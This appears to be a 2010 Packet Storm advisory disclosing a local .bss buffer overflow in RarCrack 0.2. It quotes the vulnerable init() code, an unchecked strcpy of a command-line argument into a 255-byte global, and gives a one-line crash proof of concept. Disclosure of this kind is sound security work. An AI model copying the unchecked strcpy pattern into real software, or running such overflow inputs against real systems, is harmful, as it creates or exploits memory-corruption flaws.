RarCrack 0.2 Proof Of Concept

2010-09-21T00:00:00
ID PACKETSTORM:94036
Type packetstorm
Reporter stoke
Modified 2010-09-21T00:00:00

Description

                                        
                                            `The software can be downloaded here: http://rarcrack.sourceforge.net/  
# Author: stoke  
# Date: 2010-09-20  
# Download: http://rarcrack.sourceforge.net/  
# Tested on: Backtrack 4  
  
#############################  
  
Site: http://devilcode.it | http://hack2web.altervista.org  
  
Special greetz to: nex, for reassure me when i sayed "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"  
  
____ ___ __ __   
/\ _`\ __/\_ \ /'__`\ /\ \   
\ \ \/\ \ __ __ __/\_\//\ \ ___ /\ \/\ \ \_\ \ __ ___ _ __ __ __ __ __   
\ \ \ \ \ /'__`\\ \/\ \/\ \\ \ \ /'___\ \ \ \ \ /'_` \ /'__`\ /'___\\`'__\'__`\\ \/\ \/\ \  
\ \ \_\ \\ __/ \ \_/ | \ \\_\ \_/\ \__/\ \ \_\ \\ \L\ \/\ __/ /\ \__/ \ \/\ __/ \ \_/ \_/ \  
\ \____/ \____\ \___/ \ \_\\____\ \____\\ \____/ \___,_\ \____\ \ \____\ \_\ \____\ \___x___/'  
\/___/ \/____/\/__/ \/_//____/\/____/ \/___/ \/__,_ /\/____/ \/____/\/_/\/____/\/__//__/   
  
Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind  
  
  
  
############################  
RarCrack v0.2 bss overflow PoC  
  
  
###########################################  
Function affected: init();  
  
Type: local;  
  
Variable overflowed: filename;  
###########################################  
  
########################################################  
  
Here we have:  
  
----- Start useful code snip --------  
char filename[255];  
----- End useful code snip ----------  
  
This variable is above the "main" function, so is global and allocated on .bss.  
  
In init() function we have:  
---- Start useful code snip ----  
  
if (strcmp(argv[i],"--help") == 0) {  
printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]\n\n");  
printf("Options: --help: show this screen.\n");  
printf(" --type: you can specify the archive program, this needed when\n");  
printf(" the program couldn't detect the proper file type\n");  
printf(" --threads: you can specify how many threads\n");  
printf(" will be run, maximum 12 (default: 2)\n\n");  
printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.\n");  
printf(" RarCrack! usually detects the archive type.\n\n");  
help = 1;  
break;   
} else if (strcmp(argv[i],"--threads") == 0) {  
if ((i + 1) < argc) {  
sscanf(argv[++i], "%d", &threads);  
if (threads < 1) threads = 1;  
if (threads > 12) {  
printf("INFO: number of threads adjusted to 12\n");  
threads = 12;  
}  
} else {  
printf("ERROR: missing parameter for option: --threads!\n");  
help = 1;  
}  
} else if (strcmp(argv[i],"--type") == 0) {  
if ((i + 1) < argc) {  
sscanf(argv[++i], "%s", &test);  
for (j = 0; strcmp(TYPE[j], "") != 0; j++) {  
if (strcmp(TYPE[j], test) == 0) {  
strcpy(finalcmd, CMD[j]);  
archive_type = j;  
break;  
}  
}  
if (archive_type < 0) {  
printf("WARNING: invalid parameter --type %s!\n", argv[i]);  
finalcmd[0] = '\0';  
}  
} else {  
printf("ERROR: missing parameter for option: --type!\n");  
help = 1;  
}  
} else {  
strcpy((char*)&filename, argv[i]);  
  
---- Stop useful code snip ----  
  
How you can see, at the end of this code we have a strcpy to our "filename" variable, so, if you put more than 255 bytes in an argv, you will have a Segmentation Fault.  
  
###########################################################################  
  
  
###########################################################################  
PoC  
  
  
./rarcrack `perl -e 'print "A" x500'`  
  
  
###########################################################################  
  
`